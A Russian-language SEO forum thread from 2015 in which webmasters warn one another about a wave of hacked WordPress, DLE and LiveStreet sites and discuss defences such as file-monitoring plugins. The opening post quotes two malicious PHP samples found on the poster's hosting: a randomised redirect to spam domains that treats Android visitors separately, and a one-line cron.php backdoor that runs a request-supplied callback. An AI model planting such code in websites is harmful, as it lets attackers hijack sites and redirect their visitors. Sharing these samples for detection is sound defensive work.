Очередная волна атак на сайты

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Поисковая оптимизация > Поисковая оптимизация (SEO)

Очередная волна атак на сайты

Опции

OldSpice

Topic Starter сообщение

13.5.2015, 22:24; Ответить: OldSpice

Сообщение #1

Старожил

Группа: Active User
Сообщений: 1617
Регистрация: 17.8.2011
Из: Латвия
Поблагодарили: 270 раз
Репутация:

Парни, хочу вас предупредить об активности ушлепков-какеров. Собственно советую проверить, не появились ли у вас на хостинге новые файлики с веселыми названиями secret.php, needle.php, earth.php, early.php, eight.php и тому подобные. Сделайте сортировку по дате и посмотрите последние созданные файлы.

Содержание у них либо закодированное в base64 либо вот такое:

Код

<?php

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$android_urls = array (
            'http://com-rj4.net/?a=314759&c=wl_con&s=11A',
            'http://com-gkz.net/?a=314759&c=wl_con&s=11A',
            'http://com-8qq.net/?a=314759&c=wl_con&s=11A',
);
$not_android_urls = array (
            'http://com-rj4.net/?a=314759&c=wl_con&s=11ALL',
            'http://com-gkz.net/?a=314759&c=wl_con&s=11ALL',
            'http://com-8qq.net/?a=314759&c=wl_con&s=11ALL',
);
$n = mt_rand(0,count($not_android_urls)-1);
$rand_url=$not_android_urls[$n];

if ( $android  == true)
{
$n = mt_rand(0,count($android_urls)-1);
$rand_url=$android_urls[$n];
}
?>
<meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">

Также внимание на cron.php. Скорее всего ваш оригинальный был заменен на этот:

Код

<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>

Будьте аккуратней, парни!

Так же давайте обсудим как (кроме смены паролей к фтп) с этим шлаком бороться. От себя могу добавить, что неделей ранее я поймал браузерный вирус.
В корне лежит .ftpaccess, но он уже походу не помогает..

Сообщение отредактировал OldSpice - 13.5.2015, 22:24

Поблагодарили: (2)

Eserador, Ortero

Ответить с цитированием данного сообщения

3 страниц

1 2 3 >

Ответов (1 - 9)

batueff888 batueff888 13.5.2015, 22:46; Сообщений: 156 Поблагодарили: 54 раза Репутация: 6 Просмотр профиля	13.5.2015, 22:46; Ответить: batueff888 Сообщение #2
Участник Группа: User Сообщений: 156 Регистрация: 21.1.2015 Из: Россия Поблагодарили: 54 раза Репутация: 6	OldSpice, у меня установлен плагин "WordPress File Monitor Plus", если есть какие-либо изменения в файлах, тут же сообщает мне на почту, причем конкретно указывает в каком файле какие изменения произошли. -------------------- Профессиональный копирайтинг — минимум хлопот, безупречный результат! icq 696966421 Поблагодарили: (1) Pavlofox

Вентилятор Вентилятор 14.5.2015, 3:01; Сообщений: 1938 Поблагодарили: 663 раза Репутация: 112 Просмотр профиля	14.5.2015, 3:01; Ответить: Вентилятор Сообщение #3
покупаю хорошие проекты Группа: Active User Сообщений: 1938 Регистрация: 8.8.2010 Поблагодарили: 663 раза Репутация: 112	OldSpice, о какой cms речь?

OldSpice Topic Starter OldSpiceTopic Starter 14.5.2015, 10:43; Сообщений: 1617 Поблагодарили: 270 раз Репутация: 51 Просмотр профиля	Topic Starter 14.5.2015, 10:43; Ответить: OldSpice Сообщение #4
Старожил Группа: Active User Сообщений: 1617 Регистрация: 17.8.2011 Из: Латвия Поблагодарили: 270 раз Репутация: 51	О всех У меня попортили вордпресс, дле и лайвстрит. Сообщение отредактировал OldSpice - 14.5.2015, 10:43

andrey10tic andrey10tic 14.5.2015, 10:55; Сообщений: 622 Поблагодарили: 164 раза Репутация: 17 Просмотр профиля	14.5.2015, 10:55; Ответить: andrey10tic Сообщение #5
Завсегдатай Группа: Active User Сообщений: 622 Регистрация: 14.5.2014 Из: Москва Поблагодарили: 164 раза Репутация: 17	Раньше я заметил такое на DLE. Походу некоторые "вундеркинды" взломав оставляют ссылки от своих сайтов. Сообщение отредактировал andrey10tic - 14.5.2015, 10:56 -------------------- Вечные ссылки с Топовых Ресурсов ! Выйди ТОР 10 и получай трафик!

phoenix_kys phoenix_kys 14.5.2015, 10:58; Сообщений: 1545 Поблагодарили: 243 раза Репутация: 37 Просмотр профиля	14.5.2015, 10:58; Ответить: phoenix_kys Сообщение #6
Старожил Группа: Active User Сообщений: 1545 Регистрация: 15.5.2009 Поблагодарили: 243 раза Репутация: 37	OldSpice, у вас дырка в каком-то одном сайте, через который закинуты эти вирусные файлы во все сайты на данном аккаунте

x64 x64 14.5.2015, 11:07; Сообщений: 4055 Поблагодарили: 3409 раз Репутация: 331 Просмотр профиля	14.5.2015, 11:07; Ответить: x64 Сообщение #7
F.A.L.L.O.U.T. Группа: Active User Сообщений: 4055 Регистрация: 30.6.2011 Из: Железнодорожный (Балашиха) Поблагодарили: 3409 раз Репутация: 331	Цитата(phoenix_kys @ 14.5.2015, 9:58) у вас дырка в каком-то одном сайте Встречал такую ситуацию, что со своих сайтов можно было кошмарить соседей по серверу.

webFlomaster webFlomaster 14.5.2015, 11:12; Сообщений: 103 Поблагодарили: 36 раз Репутация: 14 Просмотр профиля	14.5.2015, 11:12; Ответить: webFlomaster Сообщение #8
Участник Группа: User Сообщений: 103 Регистрация: 28.2.2014 Поблагодарили: 36 раз Репутация: 14	batueff888, простое но эффективное решение, пошел гуглить и ставить себе. А вы случайно не знаете такого же плана плагин только для Joomla? -------------------- Семантическое ядро - качественно, со скидками делают здесь

Вентилятор Вентилятор 14.5.2015, 13:42; Сообщений: 1938 Поблагодарили: 663 раза Репутация: 112 Просмотр профиля	14.5.2015, 13:42; Ответить: Вентилятор Сообщение #9
покупаю хорошие проекты Группа: Active User Сообщений: 1938 Регистрация: 8.8.2010 Поблагодарили: 663 раза Репутация: 112	OldSpice, Цитата(OldSpice @ 14.5.2015, 9:43) О всех У меня попортили вордпресс, дле и лайвстрит. т.е. насколько понял ситуацию, конкретно у вас каким-то образом взломали сайты? просто не понятно, с чего вы взяли, что это именно "волна атак", а не просто ваши недоработки по безопасности.

Зотов Зотов 14.5.2015, 13:54; Сообщений: 2178 Поблагодарили: 466 раз Репутация: 43 Просмотр профиля	14.5.2015, 13:54; Ответить: Зотов Сообщение #10
Копирайтер, стаж 11 лет Группа: Active User Сообщений: 2178 Регистрация: 11.4.2012 Из: Краснодарский край Поблагодарили: 466 раз Репутация: 43	Цитата(x64 @ 14.5.2015, 11:07) Встречал такую ситуацию, что со своих сайтов можно было кошмарить соседей по серверу. На reg.ru такая дырища была. Я им говорил про это - они отвечают, что это ваши половые трудности, разгребайтесь сами. Посмотрел свои сайты, вроде всё чисто. -------------------- Пишу тексты 11 лет Мои контакты Бот, напоминающий выпить воды Поблагодарили: (1) x64

« Предыдущая тема · Поисковая оптимизация (SEO) · Следующая тема »

3 страниц

1 2 3 >

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Сайты уходят в прошлое для развития бизнеса стали не столь актуальны	154	muratastana	30532	16.4.2024, 22:40 автор: malamut
Продам свои сайты 10 сайтов на продажу	3	ArchiDOM	1449	5.4.2024, 3:51 автор: Llirik
Есть смысл создавать сайты на латышском?	16	Nekit	3941	31.3.2024, 1:23 автор: Liudmila
Сайты с доходом на продажу. Будет ли спрос?	46	Telnor	45041	30.3.2024, 15:37 автор: trustedadvisor
Куплю хорошие сайты	7	Boymaster	2431	25.3.2024, 12:50 автор: Wilkinson

Режим отображения: Переключить на: Стандартный · Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 20.4.2024, 1:26

Дизайн